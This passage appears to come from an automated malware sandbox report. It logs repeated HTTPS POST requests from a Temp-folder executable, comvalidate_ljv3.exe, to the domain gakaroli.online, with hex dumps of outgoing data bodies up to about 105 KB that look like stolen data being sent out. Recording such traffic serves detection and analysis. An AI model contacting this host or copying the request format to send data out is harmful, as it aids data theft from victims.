                                                                                                2024-11-30 01:25:21 UTC808INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:21 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbqpNjNiA12zUUEUxNulmcSsH33e1l67a9lA%2BO8WskSYqp8w0xOjm%2FBny%2BwvEfcnWY4IEeF5ezfnX5uld0kh0JAEKQbUveg9NNCkUInvoFkiHVrqKVo8dB%2BQBaXNAEjdryw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b027bd2efa5-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1909&rtt_var=730&sent=59&recv=112&lost=0&retrans=0&sent_bytes=2837&recv_bytes=104690&delivery_rate=1483739&cwnd=193&unsent_bytes=0&cid=8a95ef34ecde2641&ts=1220&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449787172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:22 UTC407OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 745
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:22 UTC745OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 95 00 00 00 a9 ce f8 18 00 00 00 00 00 00 00 00 81 00 00 00 d4 67 7c 0c 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 d4 67 7c 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 64 02 12 14 81 2a 92 69 4d 00 00 00 08 00 00 00 a7 00 00 00 e4 1e 43 36 00 00 00 00 00 00 00 00 8a 00 00 00 72 0f a1 1b 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 00 00 00 00 00 00 00 00 31 00
                                                                                                Data Ascii: Mg|I`H1g|(((d*iMC6rI`I`I`P`I`P1
                                                                                                2024-11-30 01:25:23 UTC802INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:23 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZ8KrMxDErlTM8B7gJN5zqOwzO0zZlUK3RYBZU3hO8Ye%2BxCcidXF3kmas92DykW2oaljAumLWdN0m72uzMFd%2BR6n%2B79y56T%2B5OwTFTxTvIDS0qqArYnDod0j7kMh8c5hZOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b12f93b9e17-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1982&rtt_var=745&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1788&delivery_rate=1467336&cwnd=186&unsent_bytes=0&cid=1f45b8e174f6cdd4&ts=642&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449792172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:24 UTC407OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 212
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:24 UTC212OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 99 00 00 00 6f 77 7f 05 00 00 00 00 00 00 00 00 83 00 00 00 b7 bb bf 82 c9 60 60 49 60 c8 00 00 00 00 00 00 00 00 00 31 00 00 00 b7 bb bf 82 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 64 02 12 14 81 2a 92 69 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii: Mow``I`1(((d*i
                                                                                                2024-11-30 01:25:25 UTC800INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:25 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJuWaZdU1BhpUW7ghr7YcwSaBY4S3HqgO4XdBkDR1JSkGrUF2ohyr3F32%2Fnc6AK9YvxhgvDydrQlI3h9fuMy94RvvNXg17Jn3cVGlB7%2FX37%2BtmVrNQl2AJkVB9qeD3bIqtw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b1efe251869-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1682&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1255&delivery_rate=1644144&cwnd=232&unsent_bytes=0&cid=add48188f41d29bd&ts=779&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.449797172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:26 UTC407OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 380
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:26 UTC380OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 95 00 00 00 94 15 fb 3f 00 00 00 00 00 00 00 00 81 00 00 00 4a 8a fd 9f 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 4a 8a fd 9f 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 64 02 12 14 81 2a 92 69 4d 00 00 00 08 00 00 00 94 00 00 00 05 22 5e 2f 00 00 00 00 00 00 00 00 01 00 00 00 82 11 2f 97 c8 48 00 00 00 00 00 00 00 00 31 00 00 00 82 11 2f 97 28 a5 03 03 16 00 00 00 00 00 00 00 96
                                                                                                Data Ascii: M?JI`H1J(((d*iM"^//H1/(
                                                                                                2024-11-30 01:25:27 UTC802INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:27 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55vqADIJHJ1reWyC3jcfxB3vvYUQLiVavbf1%2FuWBTrMB8tq7Wf9Hq6MHH24queCxErHNvjTl86%2F0sRlQAUiC0RSRsHOPs%2FQeA4PCE8CJU%2BcC7m48iwMRDLyprdqzBXMC56Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b2bde454307-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1630&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1423&delivery_rate=1754807&cwnd=237&unsent_bytes=0&cid=ece08a5ac0c2e837&ts=637&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.449803172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:28 UTC409OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 29465
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:28 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 de 72 00 00 c2 26 64 1a 00 00 00 00 00 00 00 00 02 00 00 00 61 13 32 0d c9 60 00 48 00 00 00 00 00 00 00 00 55 39 00 00 61 13 32 0d 28 a5 81 02 96 00 00 04 04 00 03 58 30 2c 7b 15 ee a6 ff ff ff ff ff ff ff ff 8d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 22 2a 21 2d a3 a4 a7 a7 a9 a7 17 32 b7 b1 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 22 2a 21 2d a3 a4 a7 a7 a9 a7 a3 a4 2c a1 21 a6 a3 2d 2d 2a ab a6 21 a8 2c a3 24 a4 21 22 a4 22 21 27 a1 a0 a1 23 22 23 2b 21 a7 2c 2a 22 aa aa 25 a6 aa a6 21 a0 a5 2d a9 24 23 a2 a4 ab 27 a8 24 a2 a2 a1 ac 2b 2a 2b 2a a9 a7 2a a7 29 27 a8 a4 28 a4 22 a0 29 a6 a1 a8 22 28 a8 a0 23 a6 22 28 a2 aa ab a6 a7
                                                                                                Data Ascii: Mr&da2`HU9a2(X0,{9119.2."*!-2<"*!-,!--*!,$!""!'#"#+!,*"%!-$#'$+*+**)'(")"(#"(
                                                                                                2024-11-30 01:25:28 UTC14134OUTData Raw: a2 a5 2d ab 27 a1 22 2a a4 28 2a 2a a7 2d 2c a7 2d 25 a4 ac a6 a3 a5 ac a4 a5 2c 21 26 aa 29 2b ab 21 25 24 ac 23 25 a1 26 a3 2b 2b a4 a6 a0 22 aa 26 2a 2a 2b 2d a4 a7 a2 a4 28 a6 2b 25 a0 a7 28 a9 a8 a1 22 23 a6 ac 28 a9 28 a3 26 21 a4 a8 2c 2a ab 2a aa 2d a2 29 a3 21 22 2a a1 a4 29 29 2b 29 2a 27 a3 a2 27 2c 2c 29 2a 24 a2 a9 2c a8 23 aa a8 a9 29 a3 aa a8 22 a8 ab a3 2a a3 2c 2a a9 a3 22 ac ab a4 a8 2b a7 a5 a0 21 a0 a4 a0 25 a4 a2 aa 2b ac a1 2d 2c 27 ac 2b a5 28 29 29 a2 a6 ac a0 2b 22 23 22 24 ab a7 a3 a2 a5 a0 26 aa 28 21 24 a7 24 a2 27 a4 24 26 23 25 2d a0 24 2b 2a 25 a4 a8 25 21 a5 2c a7 ac a4 a7 a2 26 a1 a4 a4 a2 a1 25 21 28 2a 2a a0 a9 21 a2 a5 a3 a7 a2 a9 29 22 23 21 a0 a1 28 a7 2a 27 a6 29 2d a7 a3 ab 27 28 27 29 a7 a3 2d 24 a4 21 2c a0 a3 2d
                                                                                                Data Ascii: -'"*(**-,-%,!&)+!%$#%&++"&**+-(+%("#((&!,**-)!"*))+)*'',,)*$,#)"*,*"+!%+-,'+())+"#"$&(!$$'$&#%-$+*%%!,&%!(**!)"#!(*')-'(')-$!,-
                                                                                                2024-11-30 01:25:29 UTC805INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:29 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xeTC5GViNQRbPs%2BX8gO7b2c%2BG2suUdnUJuac1RWUhb21KYkmnh0XqHgSOUaujiDYL7z7eM78KtRqdS8iXp0gWG7%2BWLT7qe2wtj15iYaMPVP%2FeX61nhSrki5htosWmkp63b8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b374b3ade9a-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1570&rtt_var=602&sent=20&recv=34&lost=0&retrans=0&sent_bytes=2836&recv_bytes=30576&delivery_rate=1796923&cwnd=199&unsent_bytes=0&cid=5d3e554defabd0e7&ts=787&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.449809172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:31 UTC410OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 104764
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 01 99 01 00 f1 16 ac 23 00 00 00 00 00 00 00 00 f9 88 00 00 f8 0b 56 91 cd 60 53 98 19 1c 9b 9a 9b d2 35 b7 37 b2 b9 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 e5 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9 17 b2 3c b2 d4 36 b9 b0
                                                                                                Data Ascii: M#V`S57%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;<6
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: 32 c7 01 02 82 70 42 6d c6 e6 ed ab 16 83 94 60 85 cd 9d 22 b3 ef 00 87 d3 4e 84 c3 de 43 e2 45 d9 72 c4 75 e8 d9 2a eb aa 32 c7 04 a1 c4 fd e4 c6 a3 69 87 69 fd 1d 77 f7 7f 17 8b 2f 9d 8f c9 25 89 5e 5e 34 ec 2e 38 e8 ba cd 7d 41 35 ce e6 ac 05 28 46 67 f7 54 f1 d0 00 b6 e1 5f 72 9f 4c a1 75 d0 16 4e 49 fc ee ec f0 36 af 5b e6 dc 03 b4 b0 85 54 83 64 86 63 b0 19 30 5f 8f a6 64 62 01 e1 f5 a8 e3 f0 c3 2b 93 e7 82 db 45 be b6 00 5f 34 30 13 37 52 73 2d c1 ea 53 12 6d 35 b3 99 d1 d5 7b 3e c9 d9 ed 4a 79 f2 4e 28 f5 bb df fd 3f de 6b e5 aa 58 b3 7e ba 79 c9 01 62 0e 83 72 e7 ca 1c 2d 7b c0 71 5e 88 69 57 f6 bf 47 1c 61 45 a5 5f be 93 3d e7 1f 55 fc 89 90 2e e7 d8 c7 0d 5a 85 d9 58 dc 9c 8e 19 e5 ed 53 16 ba 63 38 fc c1 d4 a9 5a 4d 29 54 c7 f9 d9 ba d6 6d 74
                                                                                                Data Ascii: 2pBm`"NCEru*2iiw/%^^4.8}A5(FgT_rLuNI6[Tdc0_db+E_407Rs-Sm5{>JyN(?kX~ybr-{q^iWGaE_=U.ZXSc8ZM)Tmt
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: 48 b1 17 aa c2 50 30 20 92 47 82 7b 39 0c dc 8e aa 9a b6 17 8e 97 6b 8b 65 52 31 ea 07 36 e5 34 57 b5 66 91 01 7e c8 f0 3b b4 b0 41 01 e8 2c 95 a5 c3 82 9b 69 ad 30 06 f2 ca f1 a1 2c 63 19 2e ac 6b 6a 18 9a bb ad 2a 80 82 f4 cc 55 86 13 5f e7 06 47 34 a8 37 75 8e 62 b0 88 3a 97 8a b0 3a 2c 90 ba 77 b4 1c 21 fc 9d a0 a8 b8 c0 53 db 5d e3 80 65 78 fa 70 09 02 03 19 00 19 d8 70 c5 7d 07 cc e8 a6 cc 5c 2f ca b9 18 68 af 14 1d dd d2 a1 33 69 9c 8a 71 b4 27 c5 66 50 e5 2c 13 08 40 42 c0 00 52 0b 2e c9 1d 4d 3a 3d f2 f4 de 56 14 cd e9 a4 01 9e f2 b4 d0 f1 e4 06 c0 80 10 12 46 43 80 26 66 53 23 d8 cd 41 e7 a3 32 53 f4 4e 21 25 67 70 a4 12 be b8 44 81 0a fb ea 00 57 82 9f b2 a7 52 47 a6 44 86 31 00 b3 03 df f4 52 fd f5 5c 27 1d f5 78 cf 3d 7a e0 28 10 16 1b a6 83
                                                                                                Data Ascii: HP0 G{9keR164Wf~;A,i0,c.kj*U_G47ub::,w!S]expp}\/h3iq'fP,@BR.M:=VFC&fS#A2SN!%gpDWRGD1R\'x=z(
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: c9 4e 75 e7 72 7d 4e fb ad 3f 2f 72 3d 71 80 ab 99 66 db bd cb 5c 8d cf ed f8 3f f0 47 cf a8 84 63 a4 9a dd 40 7a da 8a 59 bd a4 30 c7 f0 b5 9a 89 7f 41 5d 90 aa 26 df 0f 3d 15 60 bd ff e0 fe ad e4 1d b2 72 d1 ef 0f 37 28 8b b5 9b b3 38 7c f5 5f b3 61 ea a7 cf 12 1c f1 dc 6c ef 1c 0a ea 8b 45 05 95 45 ce 5c 49 9a 18 18 af e0 58 0d da 01 e9 be 86 ce 08 f6 1c d6 8b 11 31 c6 c1 c3 f0 b9 9d 4e 72 0f 2b f2 5b 78 51 5d fd 2e 64 c1 5b 60 fd e7 b5 1e 75 ee 53 f2 a3 fe 9b 4e 7c 84 21 6b af 26 5f 18 4f 8a bf 78 d2 da 2e db 73 1b 2d c2 b7 fe 4f f5 eb 9f 91 92 27 c3 89 c9 a1 d8 7a 9c 9d d9 4c c0 40 bc af 4c ed 8e a5 4f 90 dd 7d 6f ec 1d 76 22 95 51 cf ab 9e 11 11 d2 fe d8 c7 54 d8 62 79 c6 e6 fd 9b 3a 8f 18 62 35 4f f0 30 74 d5 f4 97 99 c5 01 b8 2f e8 a4 34 8f 08 ac
                                                                                                Data Ascii: Nur}N?/r=qf\?Gc@zY0A]&=`r7(8|_alEE\IX1Nr+[xQ].d[`uSN|!k&_Ox.s-O'zL@LO}ov"QTby:b5O0t/4
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: 85 6c 27 ec 3f 26 ef c6 2e 0e a2 15 31 38 ac 0a 8a 8a 8a ad de 71 1e 18 0b b8 f5 ce 7e 9d bb 5c d0 64 d8 15 8a c1 71 95 6b a2 de 71 49 d7 64 3c 07 82 b5 88 05 68 b6 78 b5 e5 7e 4f 8d f5 fb c0 58 77 b6 f1 c9 99 cc 2c f0 41 d6 43 e7 29 26 41 95 49 ef 9e 73 ab 6d 5d 63 ef 96 14 ea 86 0a b5 7f 61 9e 4a c5 a0 51 47 91 59 39 67 8c 8d 17 85 2f b9 2d 1c 88 fa 56 af e7 57 af 3d 22 80 5f c5 c8 c3 ba d6 21 5a 15 ae 1b 6c 42 e9 aa 25 5f f8 49 c7 45 6b 64 ab 56 4c 18 9e 55 fa f5 2e 2b 32 c0 54 be 8e 82 94 05 50 3d ca 01 3e fa e2 76 93 8f 14 8b ed 2b eb ab b0 31 07 ca 9f bf ed d9 61 0e af e4 65 56 75 7f af 8b 94 ff 4b 2d 8f 1d 9c b9 ce 01 28 e6 29 40 94 d3 48 cf fe 32 c9 9e 27 d5 fd ac e3 e5 b5 0d c8 0d 72 21 d2 8b b4 1d 15 bb e0 45 15 9c 13 f1 14 29 35 60 d2 81 a5 4f
                                                                                                Data Ascii: l'?&.18q~\dqkqId<hx~OXw,AC)&AIsm]caJQGY9g/-VW="_!ZlB%_IEkdVLU.+2TP=>v+1aeVuK-()@H2'r!E)5`O
                                                                                                2024-11-30 01:25:31 UTC15331OUTData Raw: 63 33 ac 05 84 a4 3f 94 f7 3a c4 0d 38 69 c7 c5 e1 ee 75 8d ab 66 3c 8b d9 8d e2 58 bf ae 97 a0 7f 33 42 8d 72 46 25 56 b7 4e 77 7c d5 c7 93 21 45 eb da 35 25 6b ad 35 f9 0e ef 2b 10 fd 99 c9 d3 0f a8 40 3a ad ad b3 d5 23 e0 d6 2b e3 a8 69 b9 c8 ef 93 9b d6 8a e1 6f 98 3d 2e 44 8a 8b f6 6c 5f 82 f3 07 9a 8d 51 00 99 1a 8f 18 a1 42 7d a1 55 66 59 b3 ca ca 86 d5 a3 8a ea 06 28 1f 01 a8 2f 7c a4 21 ed 03 9d 0c 9f 1a 61 8e a7 85 21 35 99 0b af 61 5a 31 fe 9a ca b1 1f 46 5c 5f 88 f9 0e b3 50 00 0d 92 b0 91 68 5d 94 ff 50 61 dc 3c 79 55 a3 5c 96 b7 47 c3 ec 60 11 82 30 2a 4f d0 fb fc ab b8 55 d9 cb ff 3b 1a bc bf 37 51 be 69 bb fd 8e c6 ab 7b 41 50 c9 60 6d 4f 38 50 70 8d a3 92 5f 5d 7f 69 f5 26 76 cd eb be bc 9f a8 00 72 a9 d1 4d ac d5 ea bc cc 4b ed 39 6f 16
                                                                                                Data Ascii: c3?:8iuf<X3BrF%VNw|!E5%k5+@:#+io=.Dl_QB}UfY(/|!a!5aZ1F\_Ph]Pa<yU\G`0*OU;7Qi{AP`mO8Pp_]i&vrMK9o
                                                                                                2024-11-30 01:25:31 UTC12778OUTData Raw: 2a ec 52 bd 88 ee f1 38 75 ad a9 a9 b4 61 fb 35 1d 58 59 d1 c4 28 be b8 38 93 ae 3a c7 1c c9 04 9f 44 a8 86 1f c8 53 d9 53 79 ca 42 4d a5 a8 aa b8 10 20 ec 80 04 22 83 55 d7 e7 07 13 70 d6 f0 c1 c8 d2 0f 15 c6 da 7e 3a d8 e0 7c a2 5c 43 8f 89 c6 35 52 c3 73 99 3e d7 65 eb 9e 61 e6 42 32 83 2b dd 2c 2e 23 67 30 6e f8 2e 38 6c d9 d4 34 19 5a 7a 8a c8 43 bc 8c 7f d9 db 85 6e 06 6e 2c 6f a3 11 3a cc a4 b8 b2 1a 1a be 22 80 a2 c3 cd c4 65 f8 1a 76 25 aa ac b2 31 3f 5d fe 2a b1 27 ec a5 26 5e 73 9a f0 05 a7 e5 41 15 11 f6 66 bc 29 dd 97 8c 3f ff ca 25 f6 5b 38 27 e0 70 fb f3 7f cc e0 ca 19 f0 0a 88 86 ee c0 8e c0 5d 83 d2 e1 43 98 05 fa 5b e8 f7 0f 51 52 cf 46 fe 7e 1b 7f 71 95 ce 71 cc 62 32 85 71 7a d5 65 dd a6 4f b9 fc 65 d7 5b ad c7 6b 89 2b 92 7e 26 21 58
                                                                                                Data Ascii: *R8ua5XY(8:DSSyBM "Up~:|\C5Rs>eaB2+,.#g0n.8l4ZzCnn,o:"ev%1?]*'&^sAf)?%[8'p]C[QRF~qqb2qzeOe[k+~&!X
                                                                                                2024-11-30 01:25:32 UTC811INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:32 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggbAnPKaQY03VRvHY8sSrlQSH2%2B3%2BqxQW7N0RSlbGhTdOt7eLaJ7gWLNnWGeHC8eCXTXqJ5yylrCw4uFiw3uOVJvVZiWfM0AC4%2BebHpl%2FDZ%2BzfsSexTP1nlHXJx%2B2oAIjx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b467e77ef9d-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2036&rtt_var=778&sent=59&recv=112&lost=0&retrans=0&sent_bytes=2835&recv_bytes=106096&delivery_rate=1393794&cwnd=98&unsent_bytes=0&cid=7928d7c2eb7e307f&ts=1198&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.449815172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:33 UTC406OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
